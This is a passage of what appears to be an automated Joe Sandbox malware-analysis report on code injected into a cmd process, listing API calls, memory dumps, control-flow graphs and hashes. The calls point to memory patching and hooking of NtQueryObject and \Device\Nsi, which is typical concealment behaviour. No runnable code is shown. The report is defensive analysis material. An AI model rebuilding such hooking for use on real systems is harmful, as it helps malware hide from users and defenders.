                                                  • PathFindFileNameW.SHLWAPI ref: 000002527DEE3A44
                                                    • Part of subcall function 000002527DEE3F88: StrCmpNIW.SHLWAPI(?,?,?,000002527DEE272F), ref: 000002527DEE3FA0
                                                    • Part of subcall function 000002527DEE3EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000002527DEE3A5B), ref: 000002527DEE3EDB
                                                    • Part of subcall function 000002527DEE3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002527DEE3A5B), ref: 000002527DEE3F0E
                                                    • Part of subcall function 000002527DEE3EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002527DEE3A5B), ref: 000002527DEE3F2E
                                                    • Part of subcall function 000002527DEE3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002527DEE3A5B), ref: 000002527DEE3F47
                                                    • Part of subcall function 000002527DEE3EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002527DEE3A5B), ref: 000002527DEE3F68
                                                  • CreateThread.KERNELBASE ref: 000002527DEE3A8B
                                                    • Part of subcall function 000002527DEE1E74: GetCurrentThread.KERNEL32 ref: 000002527DEE1E7F
                                                    • Part of subcall function 000002527DEE1E74: CreateThread.KERNELBASE ref: 000002527DEE2043
                                                    • Part of subcall function 000002527DEE1E74: TlsAlloc.KERNEL32 ref: 000002527DEE2049
                                                    • Part of subcall function 000002527DEE1E74: TlsAlloc.KERNEL32 ref: 000002527DEE2055
                                                    • Part of subcall function 000002527DEE1E74: TlsAlloc.KERNEL32 ref: 000002527DEE2061
                                                    • Part of subcall function 000002527DEE1E74: TlsAlloc.KERNEL32 ref: 000002527DEE206D
                                                    • Part of subcall function 000002527DEE1E74: TlsAlloc.KERNEL32 ref: 000002527DEE2079
                                                    • Part of subcall function 000002527DEE1E74: TlsAlloc.KERNEL32 ref: 000002527DEE2085
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                                  • String ID:
                                                  • API String ID: 2779030803-0
                                                  • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                  • Instruction ID: a303dc3d1181dab7a77e9575de848fa1722927f00e0e98bc569a4a4b76e44015
                                                  • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                  • Instruction Fuzzy Hash: 4D112931610F01C3FBA2E732AD4D3ADE291EB6FB47F904119D40A821D4EF78C58C8619

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: FileHandleType
                                                  • String ID:
                                                  • API String ID: 3000768030-0
                                                  • Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                                                  • Instruction ID: d87afb56aa0498c6f51db4438266777f9f971699076ad372ca0e41d3bd48dbeb
                                                  • Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                                                  • Instruction Fuzzy Hash: 2731B622610F45D3FB61CB249988269A650F35EBB1FE50309DB6A473F0CB35D8A5C384

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: FileHandleType
                                                  • String ID:
                                                  • API String ID: 3000768030-0
                                                  • Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                                                  • Instruction ID: 7c09bb7383606170a7a98670e81d67eb35ea90bfd1e2747ba04049209a37b666
                                                  • Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                                                  • Instruction Fuzzy Hash: D431B423614F44D2EB60CB159998269B650F74EBB1F690309DB7A073F0CB36D8A5D346
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000003.2189620345.000002527DEB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002527DEB0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_3_2527deb0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                  • Instruction ID: cb0d4190fe80a46d168a930b3b74f902c2ce53e92bfc07c2dcb1d89c21a63261
                                                  • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                  • Instruction Fuzzy Hash: DA912672B01990C7DB65CF29D809F69F3D5FB4AB96F5481249E4907BC8DA34F81AC708

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 000002527DEE1724: GetProcessHeap.KERNEL32 ref: 000002527DEE172F
                                                    • Part of subcall function 000002527DEE1724: HeapAlloc.KERNEL32 ref: 000002527DEE173E
                                                    • Part of subcall function 000002527DEE1724: RegOpenKeyExW.ADVAPI32 ref: 000002527DEE17AE
                                                    • Part of subcall function 000002527DEE1724: RegOpenKeyExW.ADVAPI32 ref: 000002527DEE17DB
                                                    • Part of subcall function 000002527DEE1724: RegCloseKey.ADVAPI32 ref: 000002527DEE17F5
                                                    • Part of subcall function 000002527DEE1724: RegOpenKeyExW.ADVAPI32 ref: 000002527DEE1815
                                                    • Part of subcall function 000002527DEE1724: RegCloseKey.ADVAPI32 ref: 000002527DEE1830
                                                    • Part of subcall function 000002527DEE1724: RegOpenKeyExW.ADVAPI32 ref: 000002527DEE1850
                                                    • Part of subcall function 000002527DEE1724: RegCloseKey.ADVAPI32 ref: 000002527DEE186B
                                                    • Part of subcall function 000002527DEE1724: RegOpenKeyExW.ADVAPI32 ref: 000002527DEE188B
                                                    • Part of subcall function 000002527DEE1724: RegCloseKey.ADVAPI32 ref: 000002527DEE18A6
                                                    • Part of subcall function 000002527DEE1724: RegOpenKeyExW.ADVAPI32 ref: 000002527DEE18C6
                                                  • SleepEx.KERNELBASE ref: 000002527DEE1BDF
                                                    • Part of subcall function 000002527DEE1724: RegCloseKey.ADVAPI32 ref: 000002527DEE18E1
                                                    • Part of subcall function 000002527DEE1724: RegOpenKeyExW.ADVAPI32 ref: 000002527DEE1901
                                                    • Part of subcall function 000002527DEE1724: RegCloseKey.ADVAPI32 ref: 000002527DEE191C
                                                    • Part of subcall function 000002527DEE1724: RegOpenKeyExW.ADVAPI32 ref: 000002527DEE193C
                                                    • Part of subcall function 000002527DEE1724: RegCloseKey.ADVAPI32 ref: 000002527DEE1957
                                                    • Part of subcall function 000002527DEE1724: RegOpenKeyExW.ADVAPI32 ref: 000002527DEE1977
                                                    • Part of subcall function 000002527DEE1724: RegCloseKey.ADVAPI32 ref: 000002527DEE1992
                                                    • Part of subcall function 000002527DEE1724: RegCloseKey.ADVAPI32 ref: 000002527DEE199C
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                                  • String ID:
                                                  • API String ID: 948135145-0
                                                  • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                  • Instruction ID: bd2d7eaf7a14cefa7f2528e5c977ed793689df24c68ed188840da6f28cea7ab4
                                                  • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                  • Instruction Fuzzy Hash: EB31F865200E41C3FB56DB36DD483ADA3A4EB4EBC2F4454618E0AC73D6EE34C8D8922D

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 368 2527dee2ff0-2527dee3069 370 2527dee306f-2527dee3075 368->370 371 2527dee3384-2527dee33a7 368->371 370->371 372 2527dee307b-2527dee307e 370->372 372->371 373 2527dee3084-2527dee3087 372->373 373->371 374 2527dee308d-2527dee309d GetModuleHandleA 373->374 375 2527dee30b1 374->375 376 2527dee309f-2527dee30af GetProcAddress 374->376 377 2527dee30b4-2527dee30d2 375->377 376->377 377->371 379 2527dee30d8-2527dee30f7 StrCmpNIW 377->379 379->371 380 2527dee30fd-2527dee3101 379->380 380->371 381 2527dee3107-2527dee3111 380->381 381->371 382 2527dee3117-2527dee311e 381->382 382->371 383 2527dee3124-2527dee3137 382->383 384 2527dee3139-2527dee3145 383->384 385 2527dee3147 383->385 386 2527dee314a-2527dee314e 384->386 385->386 387 2527dee3150-2527dee315c 386->387 388 2527dee315e 386->388 389 2527dee3161-2527dee316b 387->389 388->389 390 2527dee3251-2527dee3255 389->390 391 2527dee3171-2527dee3174 389->391 392 2527dee325b-2527dee325e 390->392 393 2527dee3376-2527dee337e 390->393 394 2527dee3186-2527dee3190 391->394 395 2527dee3176-2527dee3183 call 2527dee1a30 391->395 399 2527dee3260-2527dee326c call 2527dee1a30 392->399 400 2527dee326f-2527dee3279 392->400 393->371 393->383 397 2527dee31c4-2527dee31ce 394->397 398 2527dee3192-2527dee319f 394->398 395->394 403 2527dee31d0-2527dee31dd 397->403 404 2527dee31fe-2527dee3201 397->404 398->397 402 2527dee31a1-2527dee31ae 398->402 399->400 406 2527dee327b-2527dee3288 400->406 407 2527dee32a9-2527dee32ac 400->407 410 2527dee31b1-2527dee31b7 402->410 403->404 411 2527dee31df-2527dee31ec 403->411 413 2527dee320f-2527dee321c lstrlenW 404->413 414 2527dee3203-2527dee320d call 2527dee1cc4 404->414 406->407 415 2527dee328a-2527dee3297 406->415 408 2527dee32ae-2527dee32b7 call 2527dee1cc4 407->408 409 2527dee32b9-2527dee32c6 lstrlenW 407->409 408->409 426 2527dee32ee-2527dee32f9 408->426 422 2527dee32c8-2527dee32d7 call 2527dee1cfc 409->422 423 2527dee32d9-2527dee32e3 call 2527dee3f88 409->423 420 2527dee31bd-2527dee31c2 410->420 421 2527dee3247-2527dee324c 410->421 424 2527dee31ef-2527dee31f5 411->424 417 2527dee321e-2527dee322d call 2527dee1cfc 413->417 418 2527dee322f-2527dee3241 call 2527dee3f88 413->418 414->413 414->421 416 2527dee329a-2527dee32a0 415->416 416->426 427 2527dee32a2-2527dee32a7 416->427 417->418 417->421 418->421 431 2527dee32e6-2527dee32e8 418->431 420->397 420->410 421->431 422->423 422->426 423->431 424->421 434 2527dee31f7-2527dee31fc 424->434 440 2527dee3370-2527dee3374 426->440 441 2527dee32fb-2527dee32ff 426->441 427->407 427->416 431->393 431->426 434->404 434->424 440->393 442 2527dee3301-2527dee3305 441->442 443 2527dee3307-2527dee3321 call 2527def3a40 441->443 442->443 444 2527dee3324-2527dee3327 442->444 443->444 447 2527dee334a-2527dee334d 444->447 448 2527dee3329-2527dee3347 call 2527def3a40 444->448 447->440 450 2527dee334f-2527dee336d call 2527def3a40 447->450 448->447 450->440
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                  • API String ID: 2119608203-3850299575
                                                  • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction ID: dadce38def0108ea0373d5689581338bd07ab6437b61b5bea6a84c1accaaf544
                                                  • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction Fuzzy Hash: 93B14B32210E90C3FB66CF26D8487A9E3A4F74AF86F545016EE5993BD5DA35C988C348

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 454 2527df12ff0-2527df13069 456 2527df13384-2527df133a7 454->456 457 2527df1306f-2527df13075 454->457 457->456 458 2527df1307b-2527df1307e 457->458 458->456 459 2527df13084-2527df13087 458->459 459->456 460 2527df1308d-2527df1309d GetModuleHandleA 459->460 461 2527df1309f-2527df130af GetProcAddress 460->461 462 2527df130b1 460->462 463 2527df130b4-2527df130d2 461->463 462->463 463->456 465 2527df130d8-2527df130f7 StrCmpNIW 463->465 465->456 466 2527df130fd-2527df13101 465->466 466->456 467 2527df13107-2527df13111 466->467 467->456 468 2527df13117-2527df1311e 467->468 468->456 469 2527df13124-2527df13137 468->469 470 2527df13147 469->470 471 2527df13139-2527df13145 469->471 472 2527df1314a-2527df1314e 470->472 471->472 473 2527df1315e 472->473 474 2527df13150-2527df1315c 472->474 475 2527df13161-2527df1316b 473->475 474->475 476 2527df13251-2527df13255 475->476 477 2527df13171-2527df13174 475->477 478 2527df13376-2527df1337e 476->478 479 2527df1325b-2527df1325e 476->479 480 2527df13186-2527df13190 477->480 481 2527df13176-2527df13183 call 2527df11a30 477->481 478->456 478->469 482 2527df1326f-2527df13279 479->482 483 2527df13260-2527df1326c call 2527df11a30 479->483 485 2527df13192-2527df1319f 480->485 486 2527df131c4-2527df131ce 480->486 481->480 490 2527df132a9-2527df132ac 482->490 491 2527df1327b-2527df13288 482->491 483->482 485->486 493 2527df131a1-2527df131ae 485->493 487 2527df131fe-2527df13201 486->487 488 2527df131d0-2527df131dd 486->488 496 2527df13203-2527df1320d call 2527df11cc4 487->496 497 2527df1320f-2527df1321c lstrlenW 487->497 488->487 494 2527df131df-2527df131ec 488->494 499 2527df132b9-2527df132c6 lstrlenW 490->499 500 2527df132ae-2527df132b7 call 2527df11cc4 490->500 491->490 498 2527df1328a-2527df13297 491->498 501 2527df131b1-2527df131b7 493->501 502 2527df131ef-2527df131f5 494->502 496->497 508 2527df13247-2527df1324c 496->508 505 2527df1322f-2527df13241 call 2527df13f88 497->505 506 2527df1321e-2527df1322d call 2527df11cfc 497->506 504 2527df1329a-2527df132a0 498->504 510 2527df132d9-2527df132e3 call 2527df13f88 499->510 511 2527df132c8-2527df132d7 call 2527df11cfc 499->511 500->499 518 2527df132ee-2527df132f9 500->518 501->508 509 2527df131bd-2527df131c2 501->509 502->508 514 2527df131f7-2527df131fc 502->514 517 2527df132a2-2527df132a7 504->517 504->518 505->508 512 2527df132e6-2527df132e8 505->512 506->505 506->508 508->512 509->486 509->501 510->512 511->510 511->518 512->478 512->518 514->487 514->502 517->490 517->504 524 2527df132fb-2527df132ff 518->524 525 2527df13370-2527df13374 518->525 528 2527df13307-2527df13321 call 2527df23a40 524->528 529 2527df13301-2527df13305 524->529 525->478 530 2527df13324-2527df13327 528->530 529->528 529->530 533 2527df13329-2527df13347 call 2527df23a40 530->533 534 2527df1334a-2527df1334d 530->534 533->534 534->525 535 2527df1334f-2527df1336d call 2527df23a40 534->535 535->525
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                  • API String ID: 2119608203-3850299575
                                                  • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction ID: b90af60322b20cd27978d5265888c65b4f21062be448506b439fbf5dce7beb39
                                                  • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction Fuzzy Hash: B8B19162210E90C2EB64DF26DC08799E3E4F74AB96F44501AEE29537D4DF36CD88C349
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction ID: b2d1cc67dd3afe47afa065bc42dd809506d39399c4b00122e746171b21087ada
                                                  • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction Fuzzy Hash: 17312772205F80C6EBA1CF60E8847AEB364F78A745F44452ADA4E47BD9EF38C6488714
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction ID: 129fbd740bd05eb97218e88681d7ccb800c915471e26831a9a6bb06b13b93a89
                                                  • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction Fuzzy Hash: 3C314672204F80DAEB60CF60E8443EEB360F789759F44402ADA5E47BD8DF78C6488715
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction ID: f8bf74f222bf6600dc9dea61267c9134b5e316cbb8d8ed0c25a0ba51c25bfa81
                                                  • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction Fuzzy Hash: 61416C36214F80C6EB61CF25E8447AEB3A4F78A755F500215EA9D47BE9DF38C199CB04
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction ID: d475a980ff1206aa154f053193d5efdf5eda5fbe179810dc1eacc217b108f879
                                                  • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction Fuzzy Hash: E1417C36214F80C6EB60CF24E8443AEB3A4F789765F540115EAAD47BD8DF38C599CB45
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID:
                                                  • API String ID: 1164774033-0
                                                  • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction ID: 7a1d81be4e738ca8bb3dcced6085def01c43567e421a885f74f7920ad957b3a8
                                                  • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction Fuzzy Hash: 05A10722704E80CAFB22DB75EC483ADFBA1E74B795F1C4115DE982B6D9DA34C449C708
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID:
                                                  • API String ID: 1164774033-0
                                                  • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction ID: 89d90e62fadc840837a39b706f45271b02775153ae4a02cc2c29cf8e517dc6cd
                                                  • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction Fuzzy Hash: 16A1FB22704E80C9FB20DB75DC483AEFBB1E74B795F184116DE6927AD5CA39C449C70A
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
